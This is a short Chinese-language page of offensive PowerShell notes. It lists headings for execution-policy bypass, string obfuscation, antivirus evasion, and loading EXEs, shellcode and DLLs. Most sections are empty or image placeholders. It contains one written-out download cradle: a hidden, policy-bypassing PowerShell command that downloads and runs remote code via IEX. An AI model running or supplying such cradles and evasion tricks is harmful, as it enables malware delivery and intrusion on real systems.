Powershell基础操作

查看版本$PSVersionTable

远程执行

>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"
image

加载exe

EXE2PS1

image
image
image

绕过策略

Base64

写入bat绕过

拼接拆分字符串

Replace替换函数

HTTP字符拼接绕过

图片免杀

加载shellcode

加载dll

最后更新于

这有帮助吗?